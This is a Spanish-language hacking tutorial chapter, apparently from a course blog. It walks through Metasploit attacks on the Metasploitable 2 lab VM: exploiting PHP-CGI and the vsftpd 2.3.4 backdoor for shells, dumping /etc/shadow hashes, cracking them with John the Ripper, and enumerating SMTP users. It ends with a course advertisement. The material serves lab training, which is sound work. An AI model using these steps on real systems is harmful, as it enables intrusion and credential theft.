Bienvenidos al sexto capítulo de nuestra “Guía de Hacking y Pentesting”. En este emocionante episodio, nos sumergiremos en el poderoso mundo de Metasploit, una herramienta integral para la explotación de vulnerabilidades. Desde la identificación de debilidades hasta la ejecución controlada, exploraremos cómo Metasploit se convierte en el aliado estratégico del Pentester para evaluar y fortalecer la seguridad digital.

¿Te gustaría enterarte de cuando lanzamos descuentos al Máximo o Nuevos Cursos?

Pruebas de penetración en servicios comunes

Las pruebas de penetración en servicios como HTTP, FTP, SSH, TELNET son esenciales para evaluar la seguridad de un sistema. A continuación, se describen algunos pasos generales y técnicas comunes utilizadas en este tipo de pruebas utilizaremos Metasploit y Metasploitable:

HTTP (Servidor Web):

  • Escaneo de Puertos: Utilizar herramientas como Nmap para identificar servicios activos, incluyendo HTTP en el puerto 80 y HTTPS en el puerto 443.
  • Análisis de Tecnologías Web: Utilizar herramientas como Wappalyzer o BuiltWith para identificar las tecnologías y plataformas web utilizadas en el servidor.
  • Enumeración de Directorios y Archivos: Utilizar herramientas como dirb, dirbuster o gobuster para enumerar directorios y archivos en el servidor web.
  • Escaneo de Vulnerabilidades Web: Utilizar herramientas como Nikto o OWASP ZAP para realizar escaneos de vulnerabilidades en la aplicación web.
  • Explotación de Vulnerabilidades Conocidas: Si se encuentran vulnerabilidades conocidas, utilizar exploits apropiados para verificar la explotación controlada.
  • Inyección de SQL y XSS: Probar la seguridad contra inyecciones SQL y ataques de scripting entre sitios (XSS) utilizando herramientas como SQLMap o Burp Suite.

El puerto 80 es el puerto predeterminado para los servicios http (páginas web). En un análisis anterior determinamos que el puerto 80 está abierto. Ahora es el momento de determinar qué se ejecuta detrás de ese puerto.

Buscamos cual es la IP. En este caso es 192.168.1.49.

Primero haga un escaneo de nmap:

Db_nmap -sV 192.168.1.49  -p 80

Es Apache ejecutándose en Ubuntu. Intentemos recopilar más información con un escáner auxiliar:

use auxiliary/scanner/http/http_version
> show options
set RHOST 192.168.1.49
> run

Es Apache 2.2.8 con PHP 5.2.4. Podemos navegar hasta ‘ http://192.168.231.109/phpinfo.php ‘ y confirmar la información ya recopilada:

Probemos otros módulos http para obtener más información sobre nuestro servidor:

‘dir_listing’ determinará si el listado de directorios está habilitado:

> use auxiliary/scanner/http/dir_listing
> show options
set RHOST 192.168.1.49
> run

Sin suerte. ‘dir_scanner’ buscará directorios interesantes:

> use auxiliary/scanner/http/dir_scanner
> show options
set RHOST 192.168.1.49
> run

Tenemos 6 directorios. Revisar su contenido podría darnos una ventaja para hackear nuestro objetivo. Probemos con otro módulo, ‘files_dir’:

> use auxiliary/scanner/http/files_dir

> show options

set RHOST 192.168.1.49

> run

Una vez más, estos resultados podrían marcar la diferencia y deberíamos echarles un vistazo. Otro módulo de interés id ‘options’, ‘robots_txt’ y ‘verb_auth_bypass’:

> use auxiliary/scanner/http/verb_auth_bypass
> show options

set RHOST 192.168.1.49

> run

Y muchos módulos más que te invito a probar.

Hagamos uso de la información que recopilamos.

Busquemos en exploitDB Apache con la versión de PHP:

$ searchsploit apache | grep 5.4.2

Se encontró ejecución remota de código CGI. Explotémoslo:

> use exploit/multi/http/php_cgi_arg_injection

set RHOST 192.168.1.49

>run

¡¡Tenemos un shell meterpreter!! ¡¡¡Happy hacking!!!

El puerto 80 es una buena fuente de información y aprovecha como cualquier otro puerto. Volveremos a este puerto para las aplicaciones web instaladas. En este artículo obtuvimos información sobre los servicios en ejecución y encontramos un exploit que nos proporcionó un shell.

FTP (Protocolo de Transferencia de Archivos):

  • Escaneo de Puertos: Utilizar herramientas como Nmap para identificar servicios activos, incluyendo FTP en el puerto 21.
  • Enumeración de Usuarios Anónimos: Verificar si el servidor FTP permite conexiones anónimas y si ofrece acceso a información sensible.
  • Intentos de Acceso No Autorizado: Intentar acceder al servidor FTP con credenciales débiles o por defecto para evaluar la seguridad de autenticación.
  • Escaneo de Directorios: Utilizar herramientas como Nmap o dirb para escanear directorios en el servidor FTP.
  • Transferencia de Archivos: Subir y descargar archivos para evaluar la integridad del control de acceso y la seguridad del sistema.
  • Explotación de Vulnerabilidades Conocidas: Si se encuentran vulnerabilidades conocidas en el servidor FTP, utilizar exploits apropiados para verificar la explotación controlada.

Escaneo y ataque del puerto 21 con Metasploitable 2

Comprobemos el estado de la base de datos, creemos nuestro espacio de trabajo y configuremos nuestros RHOSTS globales, para no ingresarlos en cada intento:

Comenzaremos con el puerto 21, el puerto predeterminado de ftp.

Dentro del marco de metasploit, ejecutaremos un análisis del servicio nmap dirigido al puerto 21:

> db_nmap -p 21 192.168.231.109 -A -sV -sC

MSF también dispone de un módulo auxiliar para ftp:

> use auxiliary/scanner/ftp/ftp_version
> run

Veamos los resultados de nuestro escaneo de puertos:

Disponemos de un Servidor FTP, concretamente vsFTP 2.3.4. Hagamos una búsqueda en exploitDB a través de searchploit:

$ searchsploit vsftp
> use exploit/unix/ftp/vsftp_234_backdoor
>show info
> run

Y ahora tenemos un shell en la sesión 2. Podemos ponerlo en segundo plano (^Z), enumerar las sesiones abiertas (sesiones -l) e interactuar (sesiones 2)

Intentaremos extraer usuarios y contraseñas del objetivo utilizando el módulo hashdump. Ponga la sesión en segundo plano y seleccione el módulo:

 use post/linux/gather/hashdump

> show options

> set SESSION 2

> show info

> run

Ahora usa el comando ‘loot’ para ver los resultados hasta el momento:

> loot

Pudimos obtener los archivos passwd, shadow y unshadow.

John the Ripper

Abra otra terminal para que Juancito el Destripador los abra:

$ john .msf4/loot/20190402110303_metasploitable2_192.168.231.109_linux.hashes_935091.txt

Para ver los resultados utilice la opción –show:

Escaneamos el puerto 21 y determinamos que una versión vulnerable estaba ejecutando el servicio FTP. Usando MSF pudimos:

  • crear una sesión remota,
  • obtener los archivos /etc/passwd y /etc/shadow
  • obtener credenciales de acceso usando John the Ripper

Puerto 25 SMTP (Simple Mail Transfer Protocol)

Las pruebas de penetración en SMTP (Simple Mail Transfer Protocol) son esenciales para evaluar la seguridad de los servidores de correo electrónico. A continuación, se describen las fases clave de las pruebas de penetración en SMTP:

  • Reconocimiento:
    • Identificación del servidor SMTP: Determina las direcciones IP y los nombres de dominio asociados con el servidor de correo electrónico objetivo.
    • Enumeración de usuarios: Recopila información sobre usuarios válidos, lo que podría facilitar ataques de fuerza bruta o de diccionario.
  • Análisis de Configuración:
    • Verificación de restricciones de acceso: Evalúa las políticas de acceso, como las restricciones basadas en direcciones IP.
    • Validación de filtrado de contenido: Asegura que el servidor filtre contenido malicioso y maneje adecuadamente los archivos adjuntos.
  • Ataques de Fuerza Bruta: Realiza intentos de inicio de sesión con contraseñas comunes o débiles para evaluar la resistencia del sistema.
  • Verificación de Autenticación: Autenticación segura: Confirma que las políticas de autenticación, como STARTTLS, se implementan de manera segura.
  • Pruebas de Relay Abierto: Comprueba si el servidor permite el reenvío de correos electrónicos sin autenticación, lo cual puede ser explotado por atacantes.
  • Ataques de Inyección de Correo Electrónico: Evalúa la capacidad del servidor para resistir ataques de manipulación de encabezados de correo electrónico.
  • Inyección de contenido: Verifica la resistencia a la inyección de contenido malicioso en el cuerpo del correo electrónico.
  • Exploración de Vulnerabilidades: Identifica posibles servicios relacionados con el correo electrónico que podrían tener vulnerabilidades.
  • Pruebas contra servidores web asociados: Evalúa la seguridad de aplicaciones web relacionadas con el correo electrónico.
  • Análisis de Reglas Antispam: Intenta enviar correos electrónicos maliciosos sin ser detectado por los filtros antispam.
  • Retención y eliminación de mensajes: Verifica si el servidor sigue las políticas de retención y eliminación de mensajes.
  • Documentación detallada: Proporciona informes detallados de las vulnerabilidades encontradas, junto con recomendaciones para su mitigación.
  • Las pruebas de penetración en SMTP son fundamentales para garantizar la integridad y la seguridad de las comunicaciones por correo electrónico en una organización.

Escaneo y ataque del puerto 25 con Metasploitable 2

Nuestra primera tarea es determinar qué software y versión se ejecuta detrás del puerto 25. Usemos nmap:

> db_nmap -p 25 -sC -sV -A 192.168.231.109

MSF tiene un módulo auxiliar para que lo usemos, así que probémoslo:

> use auxiliary/scanner/smtp/smtp_version

Después de ejecutar el módulo, aquí están los resultados:

Busquemos en exploitDB, google, etc. MSF tiene un módulo de enumeración de usuarios para SMTP.

> use auxiliar/scanner/smtp/smtp_enum
> run

El módulo pudo extraer una lista de usuarios. Ahora podemos intentar entrar por fuerza bruta con estos usuarios.

Comandos SMTP 25

SMTP significa Protocolo simple de transporte de correo y es un protocolo de servidor a servidor y mantiene una base de datos local de usuarios a los que debe enviar y recibir correos electrónicos.

SMTP tiene un conjunto de comandos ( véalos aquí ). Nos conectaremos a nuestro objetivo a través del puerto 25 e intentaremos adquirir los correos electrónicos de esta base de datos. Abra una nueva terminal y escriba:

$nc 192.168.231.109 25

Ya estamos dentro. Usemos el comando ‘VRFY’ para enumerar los usuarios:

>VRFY user

En lugar de hacer esto a mano, usemos una herramienta: smtp-user-enum.

Ejecutando la opción ‘-h’ podemos ver el uso. Usaremos una lista de palabras de Kali:

$ smpt-users-enum -M VRFY -U /usr/share/wordlist/fern-wifi -t 192.168.231.109

Hemos escaneado el puerto 25 (SMTP). Después de obtener más información sobre el servicio, decidimos intentar enumerar los usuarios existentes, lo que hicimos primero con el marco metasploit y luego con la herramienta smtp-users-enum.

Conclusión:

Al concluir este capítulo, hemos explorado las capacidades avanzadas de Metasploit en la explotación de vulnerabilidades. Desde la creación de payloads personalizados hasta la evaluación de impactos, Metasploit se erige como un actor central en la fase de ataque ético. No obstante, recordemos que con gran poder viene una mayor responsabilidad; el uso de Metasploit debe ser ético y con el propósito de mejorar las defensas digitales.

Si has querido mejorar tus habilidades en seguridad cibernética pero nunca lo has logrado, ahora es definitivamente el momento de dar el siguiente paso. Considera nuestro curso Universidad Hacking. Todo en Ciberseguridad. Curso Completo con una excelente relación calidad-precio ¡Desarrolla tus habilidades cibernéticas y avanza en tu carrera!

Universidad Hacking. Todo en Ciberseguridad. Curso Completo

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí: https://achirou.com/universidad

El Hacking Ético y Ciberseguridad es Transversal a todo lo que sea Tecnología. Es decir, cualquier dispositivo inteligente, sea Celular, Computadora, o hasta hoy un Vehículo, debe haber Seguridad informática.

¿Esto que significa?

Que hoy más que nunca, se necesitan personas capacitadas en este rubro para trabajar.

Por esa razón cree esta formación profesional para compartirte mis conocimientos y experiencia en la materia y puedas iniciar en este mundo del Hacking Ético y Ciberseguridad.

Te voy a estar acompañando en el proceso de aprendizaje, donde si estas empezando desde 0, sin conocimientos previos, no es un impedimento ya que iniciaremos como si no supieras nada de la materia.

Y si sos una persona con conocimientos, podrás iniciar directamente en el nivel más avanzado o en el que tu elijas.

Como en todos mis cursos en udemy, tendrás muchísima practica para que materialices lo que vas aprendiendo.

Yo soy Álvaro Chirou, tengo más de 20 Años de experiencia trabajando en Tecnología, eh dado disertaciones en eventos internacionales como OWASP, tengo más de 500.000 estudiantes en Udemy y 100 formaciones profesionales impartidas en la misma.

Empieza a aprender ya mismo!

Recuerda que tienes Acceso de por vida al curso y recibirás las actualizaciones que se hagan sobre el mismo.

Lo que aprenderás

  • Aprende Seguridad informática
  • Te enseñare Hacking Ético
  • Veremos Ciberseguridad
  • La base principal del Hacking, Redes
  • Esto es alternativo que puedes aprender, Programación (python)
  • Necesitaras saber Python para, Hacking con Python
  • Te enseñare Análisis de Malware, además haremos laboratorios, practicas y ejecutaremos Malware para que veas su comportamiento
  • Te enseñare a reforzar tu Privacidad y Anonimato
  • Aprenderás una de las herramientas mas populares por excelencia en el mundo del Hacking, Metasploit
  • Es importante que aprendas Seguridad informática Mobile ya que usamos nuestro celular como una PC
  • Veremos también el top 10 de Owasp Web
  • Veremos también el top 10 de Owasp mobile
  • Veremos también el top 10 de Owasp API
  • Ante la demanda del mercado, te enseñare Seguridad informática para empresas
  • Veras también la suit de herramientas de seguridad informática en un sistema operativo, Kali Linux
  • Herramientas de hacking para el celular en Termux
  • Seguridad informática en WordPress
  • Análisis de trafico en Wireshark

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí: https://achirou.com/universidad

¿Te gustaría enterarte de cuando lanzamos descuentos al Máximo o Nuevos Cursos?